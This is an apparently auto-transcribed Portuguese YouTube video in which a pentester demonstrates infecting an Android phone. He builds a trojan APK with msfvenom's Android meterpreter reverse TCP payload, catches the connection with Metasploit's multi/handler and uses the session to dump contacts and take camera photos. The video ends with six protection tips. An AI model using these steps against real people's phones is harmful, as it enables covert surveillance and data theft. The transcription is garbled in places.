COMO HACKERS INVADEM SEU CELULAR: SE PROTEJA AGORA!

E é assim que hackers invadem o seu celular e tem acesso total a ele então bora lá que eu vou te mostrar algumas ações maliciosas que ele pode fazer a partir daqui você já se perguntou se o seu celular já foi invadido já imaginou que um hacker pode fazer com acesso total ao seu dispositivo hoje eu vou te mostrar como hackers podem invadir o seu celular e ter acesso total aos seus dados através de um aplicativo malicioso e se você ficar comigo até o final eu vou te mostrar como se proteger desse tipo de ataque

Bora caso você não me conheça meu nome é Geraldo Alcântara eu sou pentester R in Tech Leader e hoje eu vou te mostrar como hackers invadem o seu celular importante ressaltar que a demonstração a seguir tem fins educacionais é para mostrar para vocês como um hacker invade o seu celular e como vocês podem se proteger Ok mas como é que esse tipo de ataque funciona então basicamente o hacker vai criar um aplicativo e vai embutir um malare nele um cavalo de Troia por exemplo E então para que a vítima realize o download do app o

hacker coloca o aplicativo malicioso em lojas de apps não oficiais ou distribuir o link via e-mails de Fishing redes sociais até mesmo por SMS e eles podem também usar táticas de engenharia social como promoções falsas ou ofertas atraentes para convencer a vítima a baixar o aplicativo E aí você me diz o seguinte mas Geraldo eu só baixo aplicativos do Play Store eu não aceito inst aptiv de fes desconhecidas e a eu ter dizer que eu tenho uma notícia também existem aplicativos maliciosos no Play Store que aconte que as medas de proteção aplicas pela Google ao

submeter o seu Play Store foram burladas algumas vezes por atores maliciosos é que você instalar apps da Play Store mas ainda assim é preciso tomar cuidado para não baixar apps maliciosos no seu celular mas a gente já falou demais tá na hora de colocar a mão na massa e hoje a gente vai invadir esse carinha aqui bora lá pro nosso cali e a primeira coisa que a gente precisa fazer é criar o nosso app malicioso tá Então vou utilizar o msf Venom tá então msf Venom menos P aqui o payload então Android meterpreter reverse TCP

beleza O lhost que é o IP do meu cali o lport 444 e a gente vai criar um aplicativo malicioso então pon APK Esse é o primeiro passo criar o nosso app Então beleza o nosso app malicioso está criado é o nosso hacker.apk eu vou abrir aqui o Terminator só pra gente ter uma tela expit aqui melhor pra gente conseguir ver tudo acontecendo como deve tá então se você se lembra o payload que a gente criou utiliza o meter e pra gente receber essa conexão reversa a gente vai precisar utilizar o Multi render tá então

vou abrir aqui o msf console porque o que que o Multi render vai fazer ele vai ficar aguardando então assim que o nosso alvo fizer o download instalar e abrir o aplicativo a gente vai receber a conexão aqui doer no nosso multier então que eu vou fazer aqui é use Mult handler Deixa eu só dar um cont L aqui tela Então handler pode dar um options aqui para ver quear L host que é o IP do nosso 192.16801 options novamente ok aqui ó o payload tá setado errado a gente setou o payload do Android né

então set payload Android bar meter bar reverse underline TCP Esse é o payload correto Tá e agora a gente pode utilizar o Run pro nosso multi render ficar aguardando aqui uma conexão reversa Tá o que que a gente precisa fazer agora a gente precisa fazer o nosso app chegar no alvo Então ele pode fazer isso de várias formas como eu expliquei no começo no nosso cenário aqui a gente vai fingir que a gente fez algum tipo de engenharia social e falou pro nosso alvo olha acessa esse link aqui e baixa esse app que você vai

ganhar muito dinheiro ou sei lá você vai virar um racão entendeu sei lá você vai descobrir como ganhar todas as vezes o jogo do Tigrinho não interessa o importante é que ele baixe tá E para isso eu vou utilizar o Python Aqui tá o o http server dele aqui que é que é bem simplesinho e já funciona para nós tá bom Aqui a gente tá fingindo Estamos fazendo isso via internet é claro é local Mas finge aí que você tá você serviu isso é um site na internet tá seu app e para espelhar o meu

celular eu estou utilizando aqui o visor tá então vamos abrir aqui vou abrir o Firefox vamos fazer o download desse APK Aqui ó pode ver que já tá aberto eu já fiz isso algumas vezes ele pergunta você quer baixar o apk eu vou dizer eu já baixei antes tá já fiz esse teste antes mas vou dizer quero sim quero baixar o apk beleza ele baixou e a gente já começa a receber a conexão de volta Olha que interessante tá beleza já temos uma Shell no celular alvo só para vocês entenderem como isso é poderoso eu

vou sair aqui da nossa sessão criada do meterpreter tá vou rodar novamente ó Run beleza nosso multi render tá rodando de novo então o nosso alvo baixou o nosso aplicativo e agora todas as vezes que ele Abrir o aplicativo Veja só nós recebemos uma nova sessão aqui no meterpreter E é assim que hackers invadem o seu celular e tem acesso total a ele então bora lá que eu vou te mostrar algumas ações maliciosas que ele pode fazer a partir daqui Beleza agora a gente vai ver o que que um atacante pode fazer assim que ele

invade o seu dispositivo tá então aqui no metet a gente vai utilizar o comando help vamos listar algumas ações que a gente pode tomar então por exemplo aqui falando de comando de controle de aplicação ele pode instalar uma aplicação Ele Pode listar as aplicações que estão instaladas no dispositivo pode desinstalar uma aplicação tá falando de comandos específicos aqui do Android ele pode começar uma activity Pode checar se o ambiente está rotado né se o seu dispositivo está rotado ou não pode fazer o dump de klog né de ligações dum de contatos dump de sms inclusive

ele pode até mandar sms aqui no meu celular não vai funcionar porque ele não tem nem chip é um celular que eu uso só para testes mesmo tá e aqui a gente tem uma quantidade bem interessante de comandos e falando aqui de webcam Olha que assustador tá ele consegue gravar o microfone ele consegue tirar fotos ele consegue também filmar Tá então vamos testar alguns desses comandinho aqui tá primeiro deles é V checar se o ambiente tá rotado se o dispositivo tá rotado ele está Eu sei é o meu celular então ele diz aqui Opa tá

rotado vamos ver quais apps estão instalados nesse dispositivo vamos ver se ele consegue trazer isso pra gente ele traz pra gente com maestria tá vamos ver mais alguns comandos interessantes tá Se eu tentar fazer o dump de sms não vai ter nenhum Tá bom mas eu vou fazer aqui só que funciona tá galera não tem porque realmente não tenho SMS aqui nemum SMS e no meu celular tá beleza o que mais que a gente pode fazer a gente pode fazer o dump de contatos Olha que interessante vamos ver quais contatos do nosso alvo tem ó

ele faz o damp de contatos ele grava aqui no arquiv inho tá que que a gente vai fazer aqui agora se eu der uma olhado esse arquivo agora existe então vou dar um Cat nesse contatos vamos ver quais contatos a gente tem aqui cara olha que interessante essa lista de contratos a gente tem aqui o Felipe a gente tem o João Pai a gente tem o Crew o c o Tércio x Silva tem o Jonas C né o j o Jonas Costa o Dark bite o pierc W3 Luisa a Douglas C funk das antigas Fernando

G PW God tem o profeta né O filip Profeta Gabriel S briel Leandro Rod Malu Patrick Estrela e Carlos Santos eu acho cara quanto contato barra pesada que esse cara tem hein Agora vamos partir pra parte da webcam só que para tirar fotos por exemplo eu vou precisar parar de espelhar o celular aqui senão não vai funcionar então vou fazer isso eu vou parar de espelhar o meu celular e vou partir ali para tirar algumas fotos pra gente ver se funciona mesmo ou não bora então vamos lá vamos ver se a gente consegue tirar algumas

fotos aqui tá parei de espelhar o celular Vamos ver os comandos aqui que a gente precisa para conseguir tirar as fotos então aqui o wecam commands vem aqui webcan list pra gente saber quais câmeras tem normalmente é uma traseira e uma frontal né então justamente Ó tem uma câmera traseira que é a número um e a câmera frontal que é número dois tá E para tirar uma foto ó a gente usa o Web cães Snap tá beleza e o comando é webcam Snap menos I E aí a câmera que a gente quer então vou tirar

uma foto aqui do prompt tá no do do nosso cali só pra gente ver se vai funcionar ou não opa ele tirou a foto pode ver que ficou bem zoado né ficou bem zoado mas funcionou tá funcionou ele tirou a foto Olha que legal agora vamos tirar uma foto na câmera frontal Deixa eu tirar uma selfie aqui para ver se funciona não é que funciona Olha que legal que foto renda Tá mas é isso galera conseguimos inclusive tirar fotos do nosso celular invadido tá olha que perigo eu tô querendo saber de vocês se alguma vez

o seu celular já foi invadido Então se foi Conta aí pra gente a sua história se não foi comenta aí nunca pra gente saber que você nunca foi invadido agora que eu já mostrei para vocês os perigos né que você está correndo eu vou mostrar para vocês como se proteger desse tipo de ataque e o primeiro ponto que você precisa para se proteger desse tipo de ataque é não baixe aplicativos e nem clique em link suspeitos tá pelo amor de Deus galera a gente tá em 2024 vai fazer loucura né ficar clicando em link por

aí ainda mais instalando aplicativo no celular de link você não conhece beleza dois seguindo a mesma linha baixe aplicativos apenas da Play Store eu sei que eu mostrei para você que alguns hackers ali conseguiram burlar Mas é uma minoria e é muito mais seguro se você fizer desse jeito só baixe da Play Store tá bom três preste atenção nas permissões que o aplicativo tá te pedindo tá vou mostrar aqui para vocês tá Como é que você pode ver quais permissões um aplicativo te pede no momento da instalação e depois você pode vir em configurações tá

cada celular vai pode ter um caminho um pouquinho diferente mas aplicativos e notificações e aqui você vai ter os aplicativos no nosso caso o aplicativo malicioso que o msf v não criou foi o Main activity se a gente der uma olhadinha aqui nele viermos aqui em permissões Olha a quantidade de permissões que esse cara pede pra gente tá pede permissão para acessar o SMS telefone microfone memória local câmera contatos ou seja qual app precisa dessa quantidade de permissões o que que ele faz né então fique ligado nas permissões que o aplicativo está te pedindo tá

bom tá gostando do vídeo tô te ensinando a se proteger desses malfeitores que tem por aí então Nada mais justo que você deixar aquele like se inscrever no canal e compartilhar com a galera valeu pelo apoio tamo junto quatro não permita instalação de apps de fontes desconhecidas tá vou mostrar para vocês aqui no celular como é que você pode dar uma olhada nisso como é que você vê Quais aplicativos tem permissão de instalar aplicativos de fontes desconhecidas você pode vir aqui aqui em configuração tá cada dispositivo pode ter uma particularidade aqui nesse caminho Mas no

geral é isso aqui aí você vai ver em aplicativos e notificações vai vir aqui em acesso especial vai clicar em apps né instalar apps desconhecidos e aqui você vai ter uma lista tá de aplicativos que tem essa permissão tá por exemplo aqui no meu tem vários porque é o meu aparelho de teste onde eu faço pent teste então ele de fato tem que ter essas permissões no geral nenhum aplicação tem que ter permissão para instalar outros aplicativos aí de fontes desconhecidas tá no geral é tudo não permitido no meu caso aqui como eu uso pro

meu trabalho tá tudo OK beleza e a quinta dica é habilite o Google Play Protect ele vai analisar os aplicativos em busca de comportamentos maliciosos e vai oferecer uma proteção adicional tá vou mostrar para vocês como é que faz Lembrando que Muito provavelmente o play Protect já tá habilitado aí no seu celular tá bom mas vale a pena conferir como é que você você faz para ver isso você vai vir aqui em configurações tá o caminho pode ser um pouquinho diferente dependendo do dispositivo né tela de bloqueio e segurança Google Play Protect Beleza você pode

ver que o meu está desativado tá é por isso que eu consegui baixar o app malicioso eu vou ativar e vai fazer a verificação tá verificação em andamento a gente vai aguardar um pouquinho aqui aí você pode ver que ele não encontrou nenhum app nocivo tá e o nosso app malicioso está aqui no nosso dispositivo então não sei muito bem como o Google Play funciona mas ele não encontrou porém eu sei que se eu tentar instalar novamente esse App ele não vai permitir tá e a gente tem aqui também permissões de apps removidas tá para

proteger sua privacidade as permissões de apps que não foram usadas há mais de três meses foram removidas tá bom beleza só pra gente para eu te mostrar aqui que isso funcionaria caso eu tentasse fazer o download Vamos tentar fazer o download novamente o que que eu vou fazer vou ver aqui no cali vou servir novamente o nosso APK eu vou tentar fazer o download a instalação do nosso app agora tá lembrando ele não verificou que o app já existente no nosso dispositivo era malicioso porém Se eu tentar fazer o download dele novamente Instalar ele vai

dizer que esse App tem permissões ali que não são muito legais tá vou fazer novamente aqui Firefox já vamos aqui fazer novamente o download do nosso app tá ele já tenta fazer o download ali ó baixar beleza vamos baixar o app agora Se eu tentar abrir Olha o que que acontece ó tentar instalar né no caso Olha só o app foi bloqueado ó Google Play Protect o app foi bloqueado para proteger seu dispositivo esse app pode pedir acesso a dados sensíveis isso pode aumentar o risco de roubo de identidade ou fraude financeira Beleza se você

quiser saber como é que funciona o play Protect você pode clicar aqui tá ele vai te dizer aqui tá beleza o app não foi instalado então ele não permitiu que eu instalasse o app tá então fica ligado habilita aí o play Protect caso ele não esteja habilitado tá bom E lembra de ver as permissões dos aplicativos tem alguma permissão maliciosa ok e a sexta dica é caso você ache necessário você pode instalar um antivírus se tiver um dinheirinho sobrando Claro nunca faz mal dependendo aí da fabricante Tá mas brincadeiras a parte se você quiser e

achar necessário você pode instalar um antivírus que provavelmente vai te ajudar a impedir esse tipo de ataque também voltando aqui só para lembrar que todos os testes foram feitos em um ambiente controlado no meu próprio Android Então ninguém sofreu com isso e ele já tava pré-configurado para para ser mais vulnerável mesmo para fazer essa exibição para vocês e que é onde eu faço os meus pen testes tá bom E se você chegou até aqui comenta embaixo Android só para me mostrar que é meu parceiro de verdade chegou até o final e se você gostou desse

vídeo Provavelmente você vai gostar desse outro vídeo aqui onde eu mostro o que é o hacker GPT aak vai te transformar em hacker e se você quer aprender segurança da informação e hack dá uma olhada nessa playlist aqui onde eu te ensino a montar um home laab para você praticar junto comigo beleza Espero que você tenha gostado estamo junto até o próximo valeu